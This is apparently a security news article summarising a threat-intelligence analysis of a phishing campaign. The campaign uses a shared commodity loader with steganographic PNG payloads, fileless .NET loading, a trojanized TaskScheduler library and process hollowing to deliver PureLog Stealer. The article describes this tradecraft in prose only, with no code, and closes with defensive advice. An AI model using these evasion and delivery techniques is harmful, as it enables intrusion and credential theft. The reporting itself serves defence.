Cybersecurity researchers have identified a sophisticated malware campaign that exploits a shared commodity loader across multiple threat actor groups. This operation is specifically targeting manufacturing and government organizations in Italy, Finland, and Saudi Arabia, employing precision-engineered attacks designed to pilfer industrial data and compromise sensitive administrative credentials. The campaign highlights advanced tradecraft through diverse infection vectors, including weaponized Office documents, malicious SVG files, and ZIP archives containing LNK shortcuts. Each delivery method ultimately leads to a unified commodity loader, serving as the foundation for deploying Remote Access Trojans and information-stealing malware.
The campaign’s distinctiveness stems from its complex, multi-layered defense evasion techniques. These include steganography, the use of trojanized open-source libraries, and a custom four-stage evasion pipeline meticulously crafted to minimize forensic footprints. The initial infection vector often begins with phishing emails that masquerade as legitimate purchase order communications from trusted business partners, a seemingly simple ruse that conceals the significant technical complexity orchestrated behind the scenes. Cyble analysts were able to map the entire attack workflow and understand its operational mechanics after the malware reached its second stage of execution.
Steganography and Fileless Execution: The Core Attack Mechanism
The infection chain commences with JavaScript files embedded within RAR archives. These files execute heavily obfuscated code, a deliberate measure intended to evade detection systems. The JavaScript then utilizes Windows Management Instrumentation (WMI) to spawn hidden PowerShell processes. To circumvent automated sandbox analysis, these processes employ multiple layers of obfuscation, including Base64 encoding and string manipulation, along with a deliberate five-second sleep delay.
In the subsequent stage, the malware downloads PNG image files from Archive.org. These image files contain steganographically embedded payloads. PowerShell is employed to extract the hidden Base64-encoded .NET assembly using specific delimiters and regular expression pattern matching. This extracted assembly is then loaded reflectively into memory via Reflection.Assembly::Load, a technique that ensures the final payload executes without ever touching the disk. This fileless execution method offers a crucial advantage to threat actors, significantly reducing the probability of detection and complicating forensic investigations.
The third stage of the operation involves a trojanized version of the legitimate open-source TaskScheduler library, sourced from GitHub. Threat actors modified the original source code by appending malicious functions before recompiling it. This resulted in an assembly that retains its authentic appearance and functionality while covertly embedding hidden capabilities. The loader then initiates suspended processes using RegAsm.exe, performs process injection, and executes the decoded payload. The ultimate malware delivered is PureLog Stealer, which is extracted using Triple DES decryption in CBC mode with PKCS7 padding, followed by GZip decompression.
The consistent application of steganography, string reversal, Base64 encoding, and process hollowing across various observed campaigns suggests that this commodity loader functions as a shared delivery framework among multiple threat actor groups. This points to a potential commoditization of sophisticated attack infrastructure, indicating that such advanced techniques may become more accessible to a broader range of malicious actors.
The ongoing use of this sophisticated commodity loader in targeted email campaigns raises concerns for organizations in the manufacturing and government sectors, particularly in Italy, Finland, and Saudi Arabia. The campaign’s multi-layered evasion techniques and fileless execution present a formidable challenge for traditional security defenses. Organizations are advised to strengthen their email security protocols, ensure regular patching of software vulnerabilities like CVE-2017-11882, and enhance endpoint detection and response capabilities to counter these evolving threats. Further monitoring by cybersecurity researchers will be crucial to track the development and spread of this shared malware infrastructure and to inform defensive strategies against future attacks.